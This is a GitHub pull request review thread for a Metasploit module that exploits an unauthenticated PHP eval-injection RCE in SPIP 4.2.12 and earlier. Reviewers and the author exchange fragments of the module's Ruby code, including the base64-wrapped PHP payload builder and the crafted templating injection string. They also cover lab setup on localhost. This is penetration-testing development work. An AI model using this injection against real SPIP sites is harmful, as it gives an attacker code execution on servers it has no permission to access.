SPIP Unauthenticated RCE Exploit
rapid7/metasploit-framework pull request #19394
Opened 2024-08-16 08:57 UTC by Chocapikk

# SPIP Unauthenticated RCE Exploit

Hello, Metasploit Team,

This PR introduces a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability in SPIP versions up to and including 4.2.12. The vulnerability is detailed in [this blog post](https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/). While I don't have the CVE ID for this issue yet, a patch has already been released.

You can refer to the module documentation for instructions on setting up a vulnerable environment using Docker. 

cc: @jvoisin

2024-08-18 18:30 UTC, jvoisin requested changes

2024-08-18 18:30 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +          `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
```suggestion
          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a
          payload manipulating the templating data processed by the `echappe_retour()` function, invoking
          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.
```

I'm not a native speaker either, but I think this sounds a bit better.

2024-08-18 18:30 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +          ['CVE', '2024-1234'], # I don't know
```suggestion
```

The CVE field isn't mandatory, no need to add a phony one.

2024-08-18 18:30 UTC, jvoisin commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
Why `AutoCheck=false`?

2024-08-18 18:30 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +    end
```suggestion
    if Rex::Version.new(version) > Rex::Version.new('4.2.12')
          return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
    end
    
    return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
```

I think this is a bit more readable: all conditions in this function guard against a non-exploitable instance, having the last if-else like this keeps it consitent.

2024-08-18 18:30 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +  end
There is already an `encoder/php/base64` thingy doing more checks, maybe it's possible to use it instead? @zeroSteiner do you know if it's doable/preferred?

2024-08-18 19:23 UTC, Chocapikk commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
I used "AutoCheck=false" in the demo because on the docker container I used, the check doesn't work

2024-08-18 21:37 UTC, jvoisin commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
Then it would be nice to fix this behaviour instead :D 
Or at least document it.

2024-08-18 21:50 UTC, Chocapikk commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
I added in the documentation how to setup without docker and the check works now since with docker there is no header with the SPIP version. I updated the documentation. It should be good

2024-08-19 13:24 UTC, zeroSteiner commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +  end
Yes, we should be using the encoder since it's already there. The bad characters should be added to the target definition. We also have a base64 encoder for command payloads as well, so the same technique should be able to be used for both.

2024-08-19 16:28 UTC, Chocapikk commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +  end
Hello @jvoisin and @zeroSteiner, I fixed this by using 
```ruby
framework.encoders.create('php/base64').encode(payload.encoded)
```

2024-08-20 11:13 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{compacted_payload} ?>`]"
```suggestion
  def php_exec_cmd(encoded_payload)
    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
    shell = <<-END_OF_PHP_CODE
        #{php_preamble(disabled_varname: dis)}
        $c = base64_decode("#{encoded_clean_payload}");
        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
    END_OF_PHP_CODE
    return shell
  end

  def exploit
    print_status('Preparing to send exploit payload to the target...')
    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"
```

2024-08-20 11:13 UTC, jvoisin commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +    Rex.sleep(0.5)
Is this needed? If so, please add a comment to explain why :)

2024-08-20 11:29 UTC, Chocapikk commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +    Rex.sleep(0.5)
I added this timeout because when I did some tests, without the timeout the payload didn't work all the time. I didn't investigate further than that.

2024-08-20 14:24 UTC, dwelch-r7 commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +```
does this docker compose config work you for you? all I end up with is this page
<img width="655" alt="image" src="https://github.com/user-attachments/assets/671a7720-d4df-4226-ae22-52fff87ea924">

same for the non docker instructions later on too actually

2024-08-20 14:35 UTC, dwelch-r7 commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +```
ah, after you do either docker or the other install method you need to navigate to `/ecrire` to perform the install, could that be added to the docs please?

2024-08-20 14:48 UTC, dwelch-r7 commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +```
that still didn't work with the docker compose setup but I got the exploit working with the standard install after following the install steps at `/ecrire` and then rebooting the app

2024-08-20 14:51 UTC, Chocapikk commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +```
Hello, yes I will add that in the documentation. And fix the docker compose. Here mariadb is even useless since we can do the config with SQLite.

2024-08-20 17:43 UTC, Chocapikk commented on modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
> +    Rex.sleep(0.5)
Hey, I fixed it, I removed the sleep, it was useless in the end, I think my problem was the base64 payload that had bad chars, but now it works fine.

2024-08-20 17:47 UTC, Chocapikk commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
@dwelch-r7 I added more details about the installation and fixed the docker-compose.yaml file.

2024-08-21 12:58 UTC, merged

2024-08-21 12:58 UTC, Chocapikk commented on documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md
> +To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
Oh yes because to test the docker instance, you have to add `AutoCheck=false`, for the version check on the docker instance, there is no version in the headers

2024-08-21 12:58 UTC, dwelch-r7 commented
# Release Notes

SPIP Unauthenticated RCE Exploit